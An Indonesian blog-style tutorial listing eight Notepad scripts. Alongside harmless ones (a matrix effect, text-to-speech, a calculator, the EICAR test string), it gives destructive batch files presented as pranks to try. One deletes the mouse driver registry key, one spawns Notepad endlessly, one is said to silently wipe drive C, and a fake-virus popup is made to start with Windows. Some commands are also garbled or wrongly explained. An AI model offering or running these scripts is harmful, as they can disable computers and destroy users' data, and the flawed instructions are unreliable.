
Lain dari itu, notepad dapat mengenali berbagai macam bahasa pemrograman seperti, HTML, CSS, Fortran, Javascript, PHP, Bash dan sebagainya. Maka dari itu, banyak programmer web design atau developer lainnya yang menggunakan notepad untuk melancarkan tugasnya.
Apa saja program yang dapat kita buat dari notepad? pertanyaan tersebut yang akan admin bahas saat ini. Jangan beranjak, berikut adalah beberapa program yang dapat kita buat melalui notepad.
Eits, pertama buka dulu notepadnya ya. untuk membuka notepad, kalian bisa menekan tombol Win+R lalu ketik Notepad.exe
Membuat Program dari Notepad (8 Contoh)
1. Mengetest AntiVirus
Cara ini berfungsi untuk pengetesan terhadap antivirus di komputer bekerja atau tidak.X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Buka notepad, pastekan kode diatas dan simpan dengan extensi .exe
2. Prank Virus
Maksudnya, dengan menggunakan script ini kita bisa prank teman dengan memunculkan peringatan virus yang terdetect. (Tenang, bukan virus beneran kok)lol=msgbox ("Virus Detected! Press (Yes) for Format Hardisk or (No) for Shutdown",20,"Warning")
Simpan dengan extensi .vbs
Sekarang klik kanan Start menu, pilih explore. Taruh file tadi di folder Start Menu → Programs → Startup. Dengan begitu, virus palsu tersebut akan muncul setiap Windows Start.
3. Membuat Efek Matrix
Dengan script ini kita bisa menampilkan efek matrix seperti di film yang booming di tahun sekitar 2013-an.@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Simpan dengan extensi .bat
4. Disable Mouse
Trik ini bisa dikategorikan sebagai virus, karena ketika kalian buka, Mouse pada komputer kalian tidak akan bekerja.rem Disable Mouse
set key= HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Simpan dengan extensi .bat
5. Membuka Notepad Tak Terhingga
Maksudnya, ketika kalian membuka file ini, Notepad akan terbuka secara otomatis dan tak terhingga.@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Simpan dengan extensi .bat
6. Menghapus Data Drive C
Ketika kalian buka file ini, Drive C akan otomatis terhapus tanpa pemberitahuan apapun.@Echo off
Del C:\ *.* |y
Simpan dengan extensi .bat .
7. Mengubah Text Menjadi Suara
Trik ini tergolong sangat unik, karena kalian bisa mengubah text yang kalian masukan menjadi suara. Penasaran?Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message
Simpan dengan extensi .vbs
8. Membuat Kalkulator
Untuk membuat kalian bisa copy script dibawah ini.@echo off
title My Calculator
color 1f
:top
echo --------------------------------------------------------------
echo Wellcome to My Calculator
echo --------------------------------------------------------------
echo.
set /p sum=
set /a ans=%sum%
echo.
echo = %ans%
echo --------------------------------------------------------------
pause
cls
echo Previous Answer: %ans%
goto top
pause
exit
Simpan dengan extensi .bat
Gimana? cukup menarik bukan? Beberapa cara tersebut kurang afdol jika tidak langsung dicoba.
Semoga dengan ini wawasan kita tentang dunia komputer dapat bertambah.